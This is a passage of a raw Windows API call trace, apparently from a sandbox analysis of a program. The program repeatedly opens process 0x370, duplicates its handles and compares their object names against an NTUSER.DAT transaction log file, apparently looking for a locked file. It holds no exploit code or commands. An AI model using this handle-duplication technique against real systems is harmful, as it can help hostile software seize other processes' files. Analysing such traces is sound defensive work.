dwProcessId=0x370) returned 0x1e8 [0165.952] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.953] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.953] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.953] CloseHandle (hObject=0x1e4) returned 1 [0165.954] CloseHandle (hObject=0x194) returned 1 [0165.954] CloseHandle (hObject=0x1e8) returned 1 [0165.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.954] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.954] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.955] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.955] CloseHandle (hObject=0x1e4) returned 1 [0165.955] CloseHandle (hObject=0x194) returned 1 [0165.955] CloseHandle (hObject=0x1e8) returned 1 [0165.955] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.955] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.955] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.956] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.957] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.957] CloseHandle (hObject=0x1e4) returned 1 [0165.957] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.957] CloseHandle (hObject=0x194) returned 1 [0165.958] CloseHandle (hObject=0x1e8) returned 1 [0165.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.958] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.958] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.959] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.959] CloseHandle (hObject=0x1e4) returned 1 [0165.959] CloseHandle (hObject=0x194) returned 1 [0165.959] CloseHandle (hObject=0x1e8) returned 1 [0165.959] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.959] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.960] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.961] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.961] CloseHandle (hObject=0x1e4) returned 1 [0165.961] CloseHandle (hObject=0x194) returned 1 [0165.962] CloseHandle (hObject=0x1e8) returned 1 [0165.962] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.962] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.963] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.963] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.964] CloseHandle (hObject=0x1e4) returned 1 [0165.964] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.964] CloseHandle (hObject=0x194) returned 1 [0165.964] CloseHandle (hObject=0x1e8) returned 1 [0165.964] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.964] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.964] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.965] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.965] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.965] CloseHandle (hObject=0x1e4) returned 1 [0165.966] _wcsicmp (_Str1="\\MOF", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.966] CloseHandle (hObject=0x194) returned 1 [0165.966] CloseHandle (hObject=0x1e8) returned 1 [0165.966] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.966] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.966] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.967] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.971] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.971] CloseHandle (hObject=0x1e4) returned 1 [0165.971] CloseHandle (hObject=0x194) returned 1 [0165.971] CloseHandle (hObject=0x1e8) returned 1 [0165.971] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.971] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.972] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.972] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.972] CloseHandle (hObject=0x1e4) returned 1 [0165.973] CloseHandle (hObject=0x194) returned 1 [0165.973] CloseHandle (hObject=0x1e8) returned 1 [0165.973] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.973] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.973] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.974] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.974] CloseHandle (hObject=0x1e4) returned 1 [0165.974] CloseHandle (hObject=0x194) returned 1 [0165.975] CloseHandle (hObject=0x1e8) returned 1 [0165.975] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.975] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.975] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.976] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.976] CloseHandle (hObject=0x1e4) returned 1 [0165.976] CloseHandle (hObject=0x194) returned 1 [0165.976] CloseHandle (hObject=0x1e8) returned 1 [0165.976] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.976] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.977] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.978] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.978] CloseHandle (hObject=0x1e4) returned 1 [0165.978] CloseHandle (hObject=0x194) returned 1 [0165.978] CloseHandle (hObject=0x1e8) returned 1 [0165.978] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.978] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.979] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.979] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.980] CloseHandle (hObject=0x1e4) returned 1 [0165.980] CloseHandle (hObject=0x194) returned 1 [0165.980] CloseHandle (hObject=0x1e8) returned 1 [0165.980] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.980] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.980] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.981] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.984] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.985] CloseHandle (hObject=0x1e4) returned 1 [0165.985] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.985] CloseHandle (hObject=0x194) returned 1 [0165.985] CloseHandle (hObject=0x1e8) returned 1 [0165.985] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.985] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.986] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.987] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.987] CloseHandle (hObject=0x1e4) returned 1 [0165.987] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.987] CloseHandle (hObject=0x194) returned 1 [0165.987] CloseHandle (hObject=0x1e8) returned 1 [0165.987] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.987] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.988] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.989] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.989] CloseHandle (hObject=0x1e4) returned 1 [0165.989] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.989] CloseHandle (hObject=0x194) returned 1 [0165.989] CloseHandle (hObject=0x1e8) returned 1 [0165.989] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.989] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.990] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.991] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.991] CloseHandle (hObject=0x1e4) returned 1 [0165.991] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.991] CloseHandle (hObject=0x194) returned 1 [0165.991] CloseHandle (hObject=0x1e8) returned 1 [0165.991] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.991] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.992] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.993] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.993] CloseHandle (hObject=0x1e4) returned 1 [0165.993] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 1 [0165.993] CloseHandle (hObject=0x194) returned 1 [0165.993] CloseHandle (hObject=0x1e8) returned 1 [0165.994] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.994] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.994] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.995] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.995] CloseHandle (hObject=0x1e4) returned 1 [0165.996] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0165.996] CloseHandle (hObject=0x194) returned 1 [0165.996] CloseHandle (hObject=0x1e8) returned 1 [0165.996] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.996] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.996] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.997] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.997] CloseHandle (hObject=0x1e4) returned 1 [0165.997] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.997] CloseHandle (hObject=0x194) returned 1 [0165.997] CloseHandle (hObject=0x1e8) returned 1 [0165.998] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0165.998] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.998] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.999] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.999] CloseHandle (hObject=0x1e4) returned 1 [0165.999] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.999] CloseHandle (hObject=0x194) returned 1 [0165.999] CloseHandle (hObject=0x1e8) returned 1 [0166.000] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.000] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.001] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.001] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.002] CloseHandle (hObject=0x1e4) returned 1 [0166.002] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.002] CloseHandle (hObject=0x194) returned 1 [0166.002] CloseHandle (hObject=0x1e8) returned 1 [0166.002] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.002] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.003] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.004] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.004] CloseHandle (hObject=0x1e4) returned 1 [0166.004] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0166.004] CloseHandle (hObject=0x194) returned 1 [0166.004] CloseHandle (hObject=0x1e8) returned 1 [0166.004] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.004] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe38, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.005] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.006] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.006] CloseHandle (hObject=0x1e4) returned 1 [0166.006] _wcsicmp (_Str1="\\ReportingEvents.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0166.006] CloseHandle (hObject=0x194) returned 1 [0166.006] CloseHandle (hObject=0x1e8) returned 1 [0166.006] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.006] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.007] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.008] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.008] CloseHandle (hObject=0x1e4) returned 1 [0166.008] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.008] CloseHandle (hObject=0x194) returned 1 [0166.008] CloseHandle (hObject=0x1e8) returned 1 [0166.008] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.008] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1064, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.008] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.009] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.010] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.010] CloseHandle (hObject=0x1e4) returned 1 [0166.010] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.010] CloseHandle (hObject=0x194) returned 1 [0166.010] CloseHandle (hObject=0x1e8) returned 1 [0166.010] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.010] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10cc, 